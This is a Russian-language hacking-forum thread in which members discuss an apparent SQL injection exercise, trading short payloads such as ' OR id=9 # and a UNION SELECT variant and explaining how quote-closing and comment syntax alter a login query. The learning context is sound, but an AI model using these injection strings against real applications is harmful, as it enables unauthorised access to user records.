HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 18.08.2019, 19:45
explorer
Новичок
Регистрация: 05.08.2018
Сообщений: 0
С нами: 4091032

Репутация: 0
По умолчанию

Цитата:

mrOkey сказал(а):

третий дефис как бы не нужен, достаточно пробела

В статье об этом написано После двух дефисов обязательно должен идти пробел и потом можно писать любой комментарий.
Пробел не очевиден, поэтому чтобы его не упустить и добавляют третий дефис, или просто + вместо пробела, дело привычки.
 
Ответить с цитированием

  #12  
Старый 18.08.2019, 20:02
mrOkey
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами: 4471577

Репутация: 0
По умолчанию

Цитата:

explorer сказал(а):

В статье об этом написано После двух дефисов обязательно должен идти пробел и потом можно писать любой комментарий.
Пробел не очевиден, поэтому чтобы его не упустить и добавляют третий дефис, или просто + вместо пробела, дело привычки.

я знаю, кстати возвращаесь к моему коммментарию, если поставить хэштег\шарп\диез можно не ставить после пробел
 
Ответить с цитированием

  #13  
Старый 19.08.2019, 14:18
Citizen0
Новичок
Регистрация: 07.02.2017
Сообщений: 0
С нами: 4874484

Репутация: 0
По умолчанию

Зачем тут union, если можно просто написать




SQL:


Код:
'
OR
id
=
9
#
Тогда запрос будет




SQL:


Код:
SELECT
*
FROM
users
WHERE
id
=
2
OR
login
=
''
OR
id
=
9
#'
 
Ответить с цитированием

  #14  
Старый 19.08.2019, 16:56
explorer
Новичок
Регистрация: 05.08.2018
Сообщений: 0
С нами: 4091032

Репутация: 0
По умолчанию

Цитата:

Citizen0 сказал(а):

Зачем тут union, если можно просто написать




SQL:


Код:
'
OR
id
=
9
#
Тогда запрос будет




SQL:


Код:
SELECT
*
FROM
users
WHERE
id
=
2
OR
login
=
''
OR
id
=
9
#'
Всё верно, это самый короткий вариант. Решений много

 
Ответить с цитированием

  #15  
Старый 01.09.2019, 17:11
HebiNeco
Новичок
Регистрация: 31.08.2019
Сообщений: 0
С нами: 3527714

Репутация: 0
По умолчанию

Здравствуйте. Разве переменной $text не присваивается значение запроса? Т.е. почему не сработает $text= SELECT login FROM users WHERE id=9;
Т.е. запрос должен выглядеть следующим образом:
SELECT * FROM users WHERE id=2 OR login='somelogin (Ответ на запрос)' -- -'.
Почему тогда запрос выглядит так? Подставленное значение переменной выходит за кавычки условия.
SELECT * FROM users WHERE id=2 OR login='' UNION SELECT * FROM users WHERE id=9 -- -'
 
Ответить с цитированием

  #16  
Старый 01.09.2019, 17:30
HebiNeco
Новичок
Регистрация: 31.08.2019
Сообщений: 0
С нами: 3527714

Репутация: 0
По умолчанию

Цитата:

HebiNeco сказал(а):

Здравствуйте. Разве переменной $text не присваивается значение запроса? Т.е. почему не сработает $text= SELECT login FROM users WHERE id=9;
Т.е. запрос должен выглядеть следующим образом:
SELECT * FROM users WHERE id=2 OR login='somelogin (Ответ на запрос)' -- -'.
Почему тогда запрос выглядит так? Подставленное значение переменной выходит за кавычки условия.
SELECT * FROM users WHERE id=2 OR login='' UNION SELECT * FROM users WHERE id=9 -- -'

Разобрался. Закрываем поле login=' первой кавычкой в запросе переменной, после чего идет другой запрос, поставленный через UNION, а вторую кавычку login='' отбрасываем комментарием. Таким образом запрос преобретает вид:
SELECT * FROM users WHERE id=2 OR login='' UNION SELECT * FROM users WHERE id = 9 -- -
Не гнобите, все мы учимся) А свой вопрос с ответом оставлю для таких же внимательных)
 
Ответить с цитированием

  #17  
Старый 01.09.2019, 23:35
iBragimoff
Познающий
Регистрация: 17.08.2019
Сообщений: 83
С нами: 3548433

Репутация: 0
По умолчанию

Цитата:

HebiNeco сказал(а):

Разобрался. Закрываем поле login=' первой кавычкой в запросе переменной, после чего идет другой запрос, поставленный через UNION, а вторую кавычку login='' отбрасываем комментарием. Таким образом запрос преобретает вид:
SELECT * FROM users WHERE id=2 OR login='' UNION SELECT * FROM users WHERE id = 9 -- -
Не гнобите, все мы учимся) А свой вопрос с ответом оставлю для таких же внимательных)

Никто никогда не будет гнобить того кто стремится к знаниям)
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.